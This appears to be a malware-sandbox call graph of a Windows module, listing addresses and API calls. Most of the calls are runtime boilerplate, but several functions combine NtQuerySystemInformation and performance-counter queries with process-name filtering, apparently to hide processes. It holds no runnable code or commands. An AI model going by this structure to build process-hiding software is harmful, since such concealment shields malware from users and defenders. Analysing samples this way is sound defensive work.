RtlVirtualUnwind 7861->7862 7863 213bdcecc24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7861->7863 7862->7863 7865 213bdcecc76 _invalid_parameter_noinfo 7863->7865 7867 213bdce7e30 7865->7867 7868 213bdce7e39 7867->7868 7869 213bdce7e44 GetCurrentProcess TerminateProcess 7868->7869 7870 213bdce8608 IsProcessorFeaturePresent 7868->7870 7871 213bdce8620 7870->7871 7876 213bdce86dc RtlCaptureContext 7871->7876 7877 213bdce86f6 RtlLookupFunctionEntry 7876->7877 7878 213bdce870c RtlVirtualUnwind 7877->7878 7879 213bdce8633 7877->7879 7878->7877 7878->7879 7880 213bdce85d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7879->7880 7882 213bdcefdc1 7881->7882 7883 213bdcec24f 7881->7883 7882->7883 7889 213bdcf0800 7882->7889 7885 213bdcefe14 7883->7885 7886 213bdcefe2d 7885->7886 7887 213bdcec25f 7885->7887 7886->7887 7907 213bdcee684 7886->7907 7887->7814 7898 213bdcec870 7889->7898 7891 213bdcf080f 7897 213bdcf0855 7891->7897 7906 213bdcec318 EnterCriticalSection 7891->7906 7897->7883 7899 213bdcec8d0 __free_lconv_mon 13 API calls 7898->7899 7901 213bdcec879 7899->7901 7900 213bdcec87e 7900->7891 7901->7900 7902 213bdcec8a8 FlsGetValue 7901->7902 7904 213bdcec8a4 7901->7904 7902->7904 7903 213bdcec8be 7903->7891 7904->7903 7905 213bdcec700 _invalid_parameter_noinfo 13 API calls 7904->7905 7905->7903 7908 213bdcec870 _invalid_parameter_noinfo 14 API calls 7907->7908 7909 213bdcee68d 7908->7909 7911 213bdcec8a8 FlsGetValue 7910->7911 7913 213bdcec8a4 7910->7913 7911->7913 7912 213bdcec8be 7912->7716 7913->7912 7914 213bdcec700 _invalid_parameter_noinfo 13 API calls 7913->7914 7914->7912 7938 213bdcee56c 7915->7938 7922 213bdcee367 7923 213bdced060 __free_lconv_mon 13 API calls 7922->7923 7924 213bdcee34e 7923->7924 7924->7714 7925 213bdcee376 7925->7925 7964 213bdcee6a0 7925->7964 7928 213bdcee472 7929 213bdcecfb4 __free_lconv_mon 13 API calls 7928->7929 7930 213bdcee477 7929->7930 7934 213bdced060 __free_lconv_mon 13 API calls 7930->7934 7931 213bdcee4cd 7933 213bdcee534 7931->7933 7975 213bdcede1c 7931->7975 7932 213bdcee48c 7932->7931 7935 213bdced060 __free_lconv_mon 13 API calls 7932->7935 7937 213bdced060 __free_lconv_mon 13 API calls 7933->7937 7934->7924 7935->7931 7937->7924 7939 213bdcee58f 7938->7939 7945 213bdcee599 7939->7945 7990 213bdcec318 EnterCriticalSection 7939->7990 7946 213bdcee331 7945->7946 7947 213bdcec88c 14 API calls 7945->7947 7950 213bdcedfec 7946->7950 7948 213bdcee660 7947->7948 7949 213bdcee2fc 56 API calls 7948->7949 7949->7946 7991 213bdcedb38 7950->7991 7952 213bdcee000 7953 213bdcee01e 7952->7953 7954 213bdcee00c GetOEMCP 7952->7954 7955 213bdcee033 7953->7955 7956 213bdcee023 GetACP 7953->7956 7954->7955 7955->7924 7957 213bdcec390 7955->7957 7956->7955 7958 213bdcec3db 7957->7958 7962 213bdcec39f _invalid_parameter_noinfo 7957->7962 7959 213bdcecfb4 __free_lconv_mon 13 API calls 7958->7959 7961 213bdcec3d9 7959->7961 7960 213bdcec3c2 HeapAlloc 7960->7961 7960->7962 7961->7922 7961->7925 7962->7958 7962->7960 7963 213bdceb230 _invalid_parameter_noinfo 2 API calls 7962->7963 7963->7962 7965 213bdcedfec 16 API calls 7964->7965 7966 213bdcee6db 7965->7966 7967 213bdcee831 7966->7967 7969 213bdcee718 IsValidCodePage 7966->7969 7974 213bdcee732 _invalid_parameter_noinfo 7966->7974 7968 213bdce7e30 _invalid_parameter_noinfo 8 API calls 7967->7968 7970 213bdcee469 7968->7970 7969->7967 7971 213bdcee729 7969->7971 7970->7928 7970->7932 7972 213bdcee758 GetCPInfo 7971->7972 7971->7974 7972->7967 7972->7974 8007 213bdcee104 7974->8007 8105 213bdcec318 EnterCriticalSection 7975->8105 7992 213bdcedb5c 7991->7992 7993 213bdcedb57 7991->7993 7992->7993 7994 213bdcec870 _invalid_parameter_noinfo 14 API calls 7992->7994 7993->7952 7995 213bdcedb77 7994->7995 7999 213bdcefd74 7995->7999 8000 213bdcedb9a 7999->8000 8001 213bdcefd89 7999->8001 8003 213bdcefde0 8000->8003 8001->8000 8002 213bdcf0800 _invalid_parameter_noinfo 14 API calls 8001->8002 8002->8000 8004 213bdcefe08 8003->8004 8005 213bdcefdf5 8003->8005 8004->7993 8005->8004 8006 213bdcee684 _invalid_parameter_noinfo 14 API calls 8005->8006 8006->8004 8008 213bdcee14f GetCPInfo 8007->8008 8009 213bdcee245 8007->8009 8008->8009 8015 213bdcee162 8008->8015 8010 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8009->8010 8012 213bdcee2e4 8010->8012 8012->7967 8018 213bdcf1234 8015->8018 8019 213bdcedb38 14 API calls 8018->8019 8020 213bdcf1276 8019->8020 8038 213bdceea18 8020->8038 8040 213bdceea21 MultiByteToWideChar 8038->8040 8129 213bdcecf90 8106->8129 8108 213bdcecf51 __free_lconv_mon 8109 213bdcecfb4 __free_lconv_mon 13 API calls 8108->8109 8110 213bdcecf61 8109->8110 8110->7728 8112 213bdceef69 8111->8112 8113 213bdceef8a 8111->8113 8112->8113 8114 213bdceed48 9 API calls 8112->8114 8113->7729 8114->8113 8116 213bdcedc1b 8115->8116 8121 213bdcedc00 8115->8121 8117 213bdcedc20 8116->8117 8118 213bdceeaa8 WideCharToMultiByte 8116->8118 8120 213bdcecfb4 __free_lconv_mon 13 API calls 8117->8120 8117->8121 8119 213bdcedc77 8118->8119 8119->8117 8122 213bdcedc7e GetLastError 8119->8122 8123 213bdcedca9 8119->8123 8120->8121 8121->7728 8124 213bdcecf44 13 API calls 8122->8124 8125 213bdceeaa8 WideCharToMultiByte 8123->8125 8126 213bdcedc8b 8124->8126 8127 213bdcedcd0 8125->8127 8128 213bdcecfb4 __free_lconv_mon 13 API calls 8126->8128 8127->8121 8127->8122 8128->8121 8130 213bdcec8d0 __free_lconv_mon 13 API calls 8129->8130 8131 213bdcecf99 8130->8131 8131->8108 8133 213bdcee968 8132->8133 8134 213bdcedb38 14 API calls 8133->8134 8135 213bdcee98c 8134->8135 8135->7732 8136 213bdcf117c 8137 213bdcf118e 8136->8137 8138 213bdcf11b5 8137->8138 8140 213bdcf11ce 8137->8140 8139 213bdcecfb4 __free_lconv_mon 13 API calls 8138->8139 8141 213bdcf11ba 8139->8141 8142 213bdcf11c5 8140->8142 8144 213bdcedb38 14 API calls 8140->8144 8143 213bdcece0c _invalid_parameter_noinfo 38 API calls 8141->8143 8143->8142 8144->8142 8145 213bdce3178 8147 213bdce319f 8145->8147 8146 213bdce326c 8147->8146 8148 213bdce31bc PdhGetCounterInfoW 8147->8148 8148->8146 8149 213bdce31de GetProcessHeap HeapAlloc PdhGetCounterInfoW 8148->8149 8150 213bdce3210 StrCmpW 8149->8150 8151 213bdce3258 GetProcessHeap HeapFree 8149->8151 8150->8151 8153 213bdce3225 8150->8153 8151->8146 8153->8151 8154 213bdce3720 StrCmpNW 8153->8154 8155 213bdce3752 StrStrW 8154->8155 8158 213bdce37c2 8154->8158 8156 213bdce376b StrToIntW 8155->8156 8155->8158 8157 213bdce3793 8156->8157 8156->8158 8157->8158 8164 213bdce1a30 OpenProcess 8157->8164 8158->8153 8161 213bdce3d4c StrCmpNIW 8162 213bdce37b4 8161->8162 8162->8158 8163 213bdce1cf8 2 API calls 8162->8163 8163->8158 8165 213bdce1ab4 8164->8165 8166 213bdce1a64 K32GetProcessImageFileNameW 8164->8166 8165->8158 8165->8161 8167 213bdce1aab CloseHandle 8166->8167 8168 213bdce1a7c PathFindFileNameW lstrlenW 8166->8168 8167->8165 8168->8167 8169 213bdce1a9a StrCpyW 8168->8169 8169->8167 8374 213bdcebaf4 8375 213bdcebb0d 8374->8375 8388 213bdcebb09 8374->8388 8376 213bdcee624 56 API calls 8375->8376 8377 213bdcebb12 8376->8377 8389 213bdceeb88 GetEnvironmentStringsW 8377->8389 8380 213bdcebb1f 8382 213bdced060 __free_lconv_mon 13 API calls 8380->8382 8381 213bdcebb2b 8409 213bdcebb68 8381->8409 8382->8388 8385 213bdced060 __free_lconv_mon 13 API calls 8386 213bdcebb52 8385->8386 8387 213bdced060 __free_lconv_mon 13 API calls 8386->8387 8387->8388 8390 213bdcebb17 8389->8390 8391 213bdceebb8 8389->8391 8390->8380 8390->8381 8392 213bdceeaa8 WideCharToMultiByte 8391->8392 8393 213bdceec09 8392->8393 8394 213bdceec13 FreeEnvironmentStringsW 8393->8394 8395 213bdcec390 14 API calls 8393->8395 8394->8390 8396 213bdceec23 8395->8396 8397 213bdceec2b 8396->8397 8398 213bdceec34 8396->8398 8399 213bdced060 __free_lconv_mon 13 API calls 8397->8399 8400 213bdceeaa8 WideCharToMultiByte 8398->8400 8401 213bdceec32 8399->8401 8402 213bdceec57 8400->8402 8401->8394 8403 213bdceec5b 8402->8403 8404 213bdceec65 8402->8404 8406 213bdced060 __free_lconv_mon 13 API calls 8403->8406 8405 213bdced060 __free_lconv_mon 13 API calls 8404->8405 8407 213bdceec63 FreeEnvironmentStringsW 8405->8407 8406->8407 8407->8390 8410 213bdcebb8d 8409->8410 8411 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8410->8411 8412 213bdcebbc3 8411->8412 8414 213bdcebc2d 8412->8414 8417 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8412->8417 8418 213bdcebc52 8412->8418 8422 213bdcebc66 8412->8422 8424 213bdced060 __free_lconv_mon 13 API calls 8412->8424 8425 213bdcebbcb 8412->8425 8428 213bdcec0e8 8412->8428 8413 213bdced060 __free_lconv_mon 13 API calls 8416 213bdcebb33 8413->8416 8415 213bdced060 __free_lconv_mon 13 API calls 8414->8415 8415->8416 8416->8385 8417->8412 8419 213bdcebc7c 13 API calls 8418->8419 8421 213bdcebc5a 8419->8421 8423 213bdced060 __free_lconv_mon 13 API calls 8421->8423 8426 213bdcece2c _invalid_parameter_noinfo 17 API calls 8422->8426 8423->8425 8424->8412 8425->8413 8427 213bdcebc79 8426->8427 8429 213bdcec0ff 8428->8429 8430 213bdcec0f5 8428->8430 8431 213bdcecfb4 __free_lconv_mon 13 API calls 8429->8431 8430->8429 8432 213bdcec11a 8430->8432 8436 213bdcec106 8431->8436 8433 213bdcec112 8432->8433 8435 213bdcecfb4 __free_lconv_mon 13 API calls 8432->8435 8433->8412 8434 213bdcece0c _invalid_parameter_noinfo 38 API calls 8434->8433 8435->8436 8436->8434 8170 213bdcf1790 8171 213bdcee624 56 API calls 8170->8171 8172 213bdcf1799 8171->8172 8437 213bdcf470f 8438 213bdcf471e 8437->8438 8439 213bdcf4728 8437->8439 8441 213bdcec36c LeaveCriticalSection 8438->8441 8173 213bdce5d8c 8174 213bdce5d93 8173->8174 8175 213bdce5dc0 VirtualProtect 8174->8175 8177 213bdce5cd0 8174->8177 8176 213bdce5de9 GetLastError 8175->8176 8175->8177 8176->8177 8873 213bdce800c 8875 213bdce8030 __scrt_release_startup_lock 8873->8875 8874 213bdceb341 8875->8874 8876 213bdcec8d0 __free_lconv_mon 13 API calls 8875->8876 8877 213bdceb36a 8876->8877 8878 213bdcf4608 8881 213bdce8e0c 8878->8881 8882 213bdce8e36 8881->8882 8883 213bdce8e24 8881->8883 8884 213bdce90e4 __CxxCallCatchBlock 9 API calls 8882->8884 8883->8882 8885 213bdce8e2c 8883->8885 8887 213bdce8e3b 8884->8887 8886 213bdce8e34 8885->8886 8888 213bdce90e4 __CxxCallCatchBlock 9 API calls 8885->8888 8887->8886 8889 213bdce90e4 __CxxCallCatchBlock 9 API calls 8887->8889 8890 213bdce8e5b 8888->8890 8889->8886 8891 213bdce90e4 __CxxCallCatchBlock 9 API calls 8890->8891 8892 213bdce8e68 8891->8892 8893 213bdcec0b4 14 API calls 8892->8893 8894 213bdce8e71 8893->8894 8895 213bdcec0b4 14 API calls 8894->8895 8896 213bdce8e7d 8895->8896 8442 213bdceab08 8443 213bdce90e4 __CxxCallCatchBlock 9 API calls 8442->8443 8444 213bdceab3d 8443->8444 8445 213bdce90e4 __CxxCallCatchBlock 9 API calls 8444->8445 8446 213bdceab4b __except_validate_context_record 8445->8446 8447 213bdce90e4 __CxxCallCatchBlock 9 API calls 8446->8447 8448 213bdceab8f 8447->8448 8449 213bdce90e4 __CxxCallCatchBlock 9 API calls 8448->8449 8450 213bdceab98 8449->8450 8451 213bdce90e4 __CxxCallCatchBlock 9 API calls 8450->8451 8452 213bdceaba1 8451->8452 8465 213bdce96fc 8452->8465 8455 213bdce90e4 __CxxCallCatchBlock 9 API calls 8456 213bdceabd1 __CxxCallCatchBlock 8455->8456 8457 213bdce9738 __CxxCallCatchBlock 9 API calls 8456->8457 8462 213bdceac82 8457->8462 8458 213bdceacab __CxxCallCatchBlock 8459 213bdce90e4 __CxxCallCatchBlock 9 API calls 8458->8459 8460 213bdceacbe 8459->8460 8461 213bdce90e4 __CxxCallCatchBlock 9 API calls 8460->8461 8463 213bdceacc7 8461->8463 8462->8458 8464 213bdce8db8 __CxxCallCatchBlock 9 API calls 8462->8464 8464->8458 8466 213bdce90e4 __CxxCallCatchBlock 9 API calls 8465->8466 8467 213bdce970d 8466->8467 8468 213bdce9718 8467->8468 8469 213bdce90e4 __CxxCallCatchBlock 9 API calls 8467->8469 8470 213bdce90e4 __CxxCallCatchBlock 9 API calls 8468->8470 8469->8468 8471 213bdce9729 8470->8471 8471->8455 8471->8456 8585 213bdce3288 8586 213bdce32b8 8585->8586 8587 213bdce3371 8586->8587 8588 213bdce32d5 PdhGetCounterInfoW 8586->8588 8588->8587 8589 213bdce32f3 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8588->8589 8590 213bdce335d GetProcessHeap HeapFree 8589->8590 8591 213bdce3325 StrCmpW 8589->8591 8590->8587 8591->8590 8592 213bdce333a 8591->8592 8592->8590 8593 213bdce3720 12 API calls 8592->8593 8593->8592 8472 213bdcf3720 8482 213bdce8a60 8472->8482 8474 213bdcf3748 8476 213bdce90e4 __CxxCallCatchBlock 9 API calls 8477 213bdcf3758 8476->8477 8478 213bdce90e4 __CxxCallCatchBlock 9 API calls 8477->8478 8479 213bdcf3761 8478->8479 8480 213bdcec0b4 14 API calls 8479->8480 8481 213bdcf376a 8480->8481 8483 213bdce8a90 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8482->8483 8484 213bdce8b91 8483->8484 8485 213bdce8b54 RtlUnwindEx 8483->8485 8484->8474 8484->8476 8485->8483 8594 213bdcf04a0 8595 213bdcf04b9 8594->8595 8596 213bdcf04a9 8594->8596 8597 213bdcecfb4 __free_lconv_mon 13 API calls 8596->8597 8598 213bdcf04ae 8597->8598 8599 213bdcece0c _invalid_parameter_noinfo 38 API calls 8598->8599 8599->8595 8486 213bdce7d20 8487 213bdce7d41 8486->8487 8488 213bdce7d3c 8486->8488 8490 213bdce7e50 8488->8490 8491 213bdce7ee7 8490->8491 8492 213bdce7e73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8490->8492 8491->8487 8492->8491 8600 213bdce2aa0 8602 213bdce2ae6 8600->8602 8601 213bdce2b4c 8602->8601 8603 213bdce3d4c StrCmpNIW 8602->8603 8603->8602 8897 213bdcf441f 8898 213bdcf4437 8897->8898 8904 213bdcf44a2 8897->8904 8899 213bdce90e4 __CxxCallCatchBlock 9 API calls 8898->8899 8898->8904 8900 213bdcf4484 8899->8900 8901 213bdce90e4 __CxxCallCatchBlock 9 API calls 8900->8901 8902 213bdcf4499 8901->8902 8903 213bdcec0b4 14 API calls 8902->8903 8903->8904 8905 213bdcf461e 8906 213bdce90e4 __CxxCallCatchBlock 9 API calls 8905->8906 8907 213bdcf462c 8906->8907 8908 213bdcf4637 8907->8908 8909 213bdce90e4 __CxxCallCatchBlock 9 API calls 8907->8909 8909->8908 8604 213bdcef49c 8605 213bdcef4a8 8604->8605 8607 213bdcef4cf 8605->8607 8608 213bdcf19cc 8605->8608 8609 213bdcf19d1 8608->8609 8610 213bdcf1a0c 8608->8610 8611 213bdcf19f2 DeleteCriticalSection 8609->8611 8612 213bdcf1a04 8609->8612 8610->8605 8611->8611 8611->8612 8613 213bdced060 __free_lconv_mon 13 API calls 8612->8613 8613->8610 8910 213bdced418 8911 213bdced43d 8910->8911 8918 213bdced454 8910->8918 8912 213bdcecfb4 __free_lconv_mon 13 API calls 8911->8912 8914 213bdced442 8912->8914 8913 213bdced4e4 8916 213bdceb914 13 API calls 8913->8916 8915 213bdcece0c _invalid_parameter_noinfo 38 API calls 8914->8915 8917 213bdced44d 8915->8917 8919 213bdced53c 8916->8919 8918->8913 8926 213bdced49a 8918->8926 8928 213bdced576 8918->8928 8943 213bdced654 8918->8943 9005 213bdced7d8 8918->9005 8921 213bdced544 8919->8921 8931 213bdced597 8919->8931 8924 213bdced060 __free_lconv_mon 13 API calls 8921->8924 8923 213bdced5f6 8925 213bdced060 __free_lconv_mon 13 API calls 8923->8925 8927 213bdced54b 8924->8927 8929 213bdced601 8925->8929 8930 213bdced4bd 8926->8930 8935 213bdced060 __free_lconv_mon 13 API calls 8926->8935 8927->8930 8936 213bdced060 __free_lconv_mon 13 API calls 8927->8936 8928->8930 8934 213bdced060 __free_lconv_mon 13 API calls 8928->8934 8933 213bdced61a 8929->8933 8937 213bdced060 __free_lconv_mon 13 API calls 8929->8937 8932 213bdced060 __free_lconv_mon 13 API calls 8930->8932 8931->8923 8931->8931 8940 213bdced63c 8931->8940 9042 213bdcf0c78 8931->9042 8932->8917 8938 213bdced060 __free_lconv_mon 13 API calls 8933->8938 8934->8928 8935->8926 8936->8927 8937->8929 8938->8917 8941 213bdcece2c _invalid_parameter_noinfo 17 API calls 8940->8941 8942 213bdced651 8941->8942 8944 213bdced682 8943->8944 8944->8944 8945 213bdced69e 8944->8945 8946 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8944->8946 8945->8918 8947 213bdced6cd 8946->8947 8948 213bdced6e6 8947->8948 8949 213bdcf0c78 38 API calls 8947->8949 8950 213bdcf0c78 38 API calls 8948->8950 8952 213bdced7bc 8948->8952 8949->8948 8951 213bdced703 8950->8951 8951->8952 8954 213bdced73f 8951->8954 8955 213bdced722 8951->8955 8956 213bdced74d 8951->8956 8953 213bdcece2c _invalid_parameter_noinfo 17 API calls 8952->8953 8964 213bdced7d7 8953->8964 8958 213bdced060 __free_lconv_mon 13 API calls 8954->8958 8957 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 8955->8957 8959 213bdced737 8956->8959 9051 213bdceeca0 8956->9051 8961 213bdced72d 8957->8961 8958->8952 8959->8954 8963 213bdced060 __free_lconv_mon 13 API calls 8959->8963 8960 213bdced83a 8968 213bdced84c 8960->8968 8974 213bdced861 _invalid_parameter_noinfo 8960->8974 8965 213bdced060 __free_lconv_mon 13 API calls 8961->8965 8963->8954 8964->8960 9060 213bdcf1198 8964->9060 8965->8959 8966 213bdced775 8969 213bdced790 8966->8969 8970 213bdced77a 8966->8970 8971 213bdced654 52 API calls 8968->8971 8973 213bdced060 __free_lconv_mon 13 API calls 8969->8973 8972 213bdced060 __free_lconv_mon 13 API calls 8970->8972 9002 213bdced85c 8971->9002 8972->8959 8973->8954 8975 213bdcedb38 14 API calls 8974->8975 8977 213bdced8cb 8975->8977 8976 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8978 213bdcedb24 8976->8978 8979 213bdced8da 8977->8979 8980 213bdceef58 9 API calls 8977->8980 8978->8918 9069 213bdced0cc 8979->9069 8980->8979 8983 213bdced968 8984 213bdced654 52 API calls 8983->8984 8985 213bdced978 8984->8985 8987 213bdced060 __free_lconv_mon 13 API calls 8985->8987 8985->9002 8986 213bdcedb38 14 API calls 8996 213bdced992 8986->8996 8987->9002 8988 213bdceef58 9 API calls 8988->8996 8990 213bdced654 52 API calls 8990->8996 8991 213bdceda88 FindNextFileW 8993 213bdcedaa0 8991->8993 8991->8996 8992 213bdcedaea 8994 213bdcedaf8 FindClose 8992->8994 8997 213bdced060 __free_lconv_mon 13 API calls 8992->8997 8995 213bdcedacc FindClose 8993->8995 9113 213bdcf08e0 8993->9113 8998 213bdcedb08 8994->8998 8994->9002 9001 213bdcedadc 8995->9001 8995->9002 8996->8986 8996->8988 8996->8990 8996->8991 8996->8992 8999 213bdced060 13 API calls __free_lconv_mon 8996->8999 9091 213bdced26c 8996->9091 8997->8994 9003 213bdced060 __free_lconv_mon 13 API calls 8998->9003 8999->8996 9004 213bdced060 __free_lconv_mon 13 API calls 9001->9004 9002->8976 9003->9002 9004->9002 9006 213bdced83a 9005->9006 9007 213bdced818 9005->9007 9009 213bdced84c 9006->9009 9012 213bdced861 _invalid_parameter_noinfo 9006->9012 9007->9006 9008 213bdcf1198 38 API calls 9007->9008 9008->9007 9010 213bdced654 56 API calls 9009->9010 9011 213bdced85c 9010->9011 9014 213bdce7e30 _invalid_parameter_noinfo 8 API calls 9011->9014 9013 213bdcedb38 14 API calls 9012->9013 9015 213bdced8cb 9013->9015 9016 213bdcedb24 9014->9016 9017 213bdced8da 9015->9017 9018 213bdceef58 9 API calls 9015->9018 9016->8918 9019 213bdced0cc 16 API calls 9017->9019 9018->9017 9020 213bdced93b FindFirstFileExW 9019->9020 9021 213bdced968 9020->9021 9034 213bdced992 9020->9034 9022 213bdced654 56 API calls 9021->9022 9023 213bdced978 9022->9023 9023->9011 9025 213bdced060 __free_lconv_mon 13 API calls 9023->9025 9024 213bdcedb38 14 API calls 9024->9034 9025->9011 9026 213bdceef58 9 API calls 9026->9034 9027 213bdced26c 16 API calls 9027->9034 9028 213bdced654 56 API calls 9028->9034 9029 213bdceda88 FindNextFileW 9031 213bdcedaa0 9029->9031 9029->9034 9030 213bdcedaea 9032 213bdcedaf8 FindClose 9030->9032 9035 213bdced060 __free_lconv_mon 13 API calls 9030->9035 9033 213bdcedacc FindClose 9031->9033 9038 213bdcf08e0 38 API calls 9031->9038 9032->9011 9036 213bdcedb08 9032->9036 9033->9011 9039 213bdcedadc 9033->9039 9034->9024 9034->9026 9034->9027 9034->9028 9034->9029 9034->9030 9037 213bdced060 13 API calls __free_lconv_mon 9034->9037 9035->9032 9040 213bdced060 __free_lconv_mon 13 API calls 9036->9040 9037->9034 9038->9033 9041 213bdced060 __free_lconv_mon 13 API calls 9039->9041 9040->9011 9041->9011 9045 213bdcf0c95 9042->9045 9043 213bdcf0c9a 9044 213bdcecfb4 __free_lconv_mon 13 API calls 9043->9044 9048 213bdcf0cb0 9043->9048 9046 213bdcf0ca4 9044->9046 9045->9043 9045->9048 9049 213bdcf0ce4 9045->9049 9047 213bdcece0c _invalid_parameter_noinfo 38 API calls 9046->9047 9047->9048 9048->8931 9049->9048 9050 213bdcecfb4 __free_lconv_mon 13 API calls 9049->9050 9050->9046 9052 213bdceecc2 9051->9052 9053 213bdceecdf 9051->9053 9052->9053 9054 213bdceecd0 9052->9054 9055 213bdceece9 9053->9055 9121 213bdcf17b0 9053->9121 9056 213bdcecfb4 __free_lconv_mon 13 API calls 9054->9056 9128 213bdcf1800 9055->9128 9059 213bdceecd5 _invalid_parameter_noinfo 9056->9059 9059->8966 9061 213bdcf11a0 9060->9061 9062 213bdcf11b5 9061->9062 9064 213bdcf11ce 9061->9064 9063 213bdcecfb4 __free_lconv_mon 13 API calls 9062->9063 9065 213bdcf11ba 9063->9065 9067 213bdcedb38 14 API calls 9064->9067 9068 213bdcf11c5 9064->9068 9066 213bdcece0c _invalid_parameter_noinfo 38 API calls 9065->9066 9066->9068 9067->9068 9068->8964 9070 213bdced11a 9069->9070 9071 213bdced0f6 9069->9071 9072 213bdced17f 9070->9072 9073 213bdced11f 9070->9073 9074 213bdced060 __free_lconv_mon 13 API calls 9071->9074 9076 213bdced105 FindFirstFileExW 9071->9076 9075 213bdceea18 MultiByteToWideChar 9072->9075 9073->9076 9079 213bdced060 __free_lconv_mon 13 API calls 9073->9079 9083 213bdced134 9073->9083 9074->9076 9082 213bdced19b 9075->9082 9076->8983 9076->8996 9077 213bdcec390 14 API calls 9077->9076 9078 213bdced1a2 GetLastError 9080 213bdcecf44 13 API calls 9078->9080 9079->9083 9085 213bdced1af 9080->9085 9081 213bdced1e0 9081->9076 9084 213bdceea18 MultiByteToWideChar 9081->9084 9082->9078 9082->9081 9086 213bdced1d3 9082->9086 9087 213bdced060 __free_lconv_mon 13 API calls 9082->9087 9083->9077 9089 213bdced23a 9084->9089 9090 213bdcecfb4 __free_lconv_mon 13 API calls 9085->9090 9088 213bdcec390 14 API calls 9086->9088 9087->9086 9088->9081 9089->9076 9089->9078 9090->9076 9092 213bdced2ba 9091->9092 9093 213bdced296 9091->9093 9094 213bdced2c0 9092->9094 9095 213bdced31f 9092->9095 9097 213bdced060 __free_lconv_mon 13 API calls 9093->9097 9099 213bdced2a5 9093->9099 9098 213bdced2d5 9094->9098 9094->9099 9100 213bdced060 __free_lconv_mon 13 API calls 9094->9100 9096 213bdceeaa8 WideCharToMultiByte 9095->9096 9106 213bdced343 9096->9106 9097->9099 9101 213bdcec390 14 API calls 9098->9101 9099->8996 9100->9098 9101->9099 9102 213bdced34a GetLastError 9104 213bdcecf44 13 API calls 9102->9104 9103 213bdced387 9103->9099 9108 213bdceeaa8 WideCharToMultiByte 9103->9108 9105 213bdced357 9104->9105 9109 213bdcecfb4 __free_lconv_mon 13 API calls 9105->9109 9106->9102 9106->9103 9107 213bdced37b 9106->9107 9110 213bdced060 __free_lconv_mon 13 API calls 9106->9110 9111 213bdcec390 14 API calls 9107->9111 9112 213bdced3e9 9108->9112 9109->9099 9110->9107 9111->9103 9112->9099 9112->9102 9114 213bdcf0912 9113->9114 9115 213bdcecfb4 __free_lconv_mon 13 API calls 9114->9115 9120 213bdcf0927 _invalid_parameter_noinfo 9114->9120 9116 213bdcf091c 9115->9116 9117 213bdcece0c _invalid_parameter_noinfo 38 API calls 9116->9117 9117->9120 9118 213bdce7e30 _invalid_parameter_noinfo 8 API calls 9119 213bdcf0c68 9118->9119 9119->8995 9120->9118 9122 213bdcf17d2 HeapSize 9121->9122 9123 213bdcf17b9 9121->9123 9124 213bdcecfb4 __free_lconv_mon 13 API calls 9123->9124 9125 213bdcf17be 9124->9125 9126 213bdcece0c _invalid_parameter_noinfo 38 API calls 9125->9126 9127 213bdcf17c9 9126->9127 9127->9055 9129 213bdcf181f 9128->9129 9130 213bdcf1815 9128->9130 9132 213bdcf1824 9129->9132 9138 213bdcf182b _invalid_parameter_noinfo 9129->9138 9131 213bdcec390 14 API calls 9130->9131 9137 213bdcf181d 9131->9137 9135 213bdced060 __free_lconv_mon 13 API calls 9132->9135 9133 213bdcf1831 9136 213bdcecfb4 __free_lconv_mon 13 API calls 9133->9136 9134 213bdcf185e HeapReAlloc 9134->9137 9134->9138 9135->9137 9136->9137 9137->9059 9138->9133 9138->9134 9139 213bdceb230 _invalid_parameter_noinfo 2 API calls 9138->9139 9139->9138 8178 213bdcebf98 8179 213bdcebfb1 8178->8179 8180 213bdcebfc9 8178->8180 8179->8180 8181 213bdced060 __free_lconv_mon 13 API calls 8179->8181 8181->8180 7563 213bdce2214 NtQuerySystemInformation 7564 213bdce2250 7563->7564 7565 213bdce235b 7564->7565 7572 213bdce2269 7564->7572 7576 213bdce2326 7564->7576 7566 213bdce23cf 7565->7566 7567 213bdce2360 7565->7567 7569 213bdce23d4 7566->7569 7566->7576 7583 213bdce3398 GetProcessHeap HeapAlloc 7567->7583 7571 213bdce3398 11 API calls 7569->7571 7570 213bdce22a1 StrCmpNIW 7570->7572 7574 213bdce2378 7571->7574 7572->7570 7573 213bdce22c8 7572->7573 7572->7576 7573->7572 7577 213bdce1d2c 7573->7577 7574->7574 7574->7576 7578 213bdce1db0 7577->7578 7579 213bdce1d53 GetProcessHeap HeapAlloc 7577->7579 7578->7573 7579->7578 7580 213bdce1d8e 7579->7580 7589 213bdce1cf8 7580->7589 7587 213bdce33eb 7583->7587 7584 213bdce34a9 GetProcessHeap HeapFree 7584->7574 7585 213bdce34a4 7585->7584 7586 213bdce3436 StrCmpNIW 7586->7587 7587->7584 7587->7585 7587->7586 7588 213bdce1d2c 6 API calls 7587->7588 7588->7587 7590 213bdce1d18 GetProcessHeap HeapFree 7589->7590 7591 213bdce1d0f 7589->7591 7590->7578 7592 213bdce1530 2 API calls 7591->7592 7592->7590 8614 213bdceae94 8621 213bdceadc7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8614->8621 8615 213bdceaebb 8616 213bdce90e4 __CxxCallCatchBlock 9 API calls 8615->8616 8618 213bdceaec0 8616->8618 8617 213bdceaecb __FrameHandler3::GetHandlerSearchState 8618->8617 8619 213bdce90e4 __CxxCallCatchBlock 9 API calls 8618->8619 8619->8617 8620 213bdce978c 9 API calls Is_bad_exception_allowed 8620->8621 8621->8615 8621->8617 8621->8620 8623 213bdce97b4 8621->8623 8624 213bdce90e4 __CxxCallCatchBlock 9 API calls 8623->8624 8625 213bdce97c2 8624->8625 8625->8621 9140 213bdce8432 9141 213bdce8e80 __std_exception_copy 38 API calls 9140->9141 9142 213bdce845d 9141->9142 8493 213bdcef130 VirtualProtect 9143 213bdcef630 9144 213bdcef660 9143->9144 9147 213bdcef687 9143->9147 9145 213bdcec8d0 __free_lconv_mon 13 API calls 9144->9145 9144->9147 9149 213bdcef674 9144->9149 9145->9149 9146 213bdcef75c 9150 213bdcef78a 9146->9150 9151 213bdcef873 9146->9151 9164 213bdcef7c3 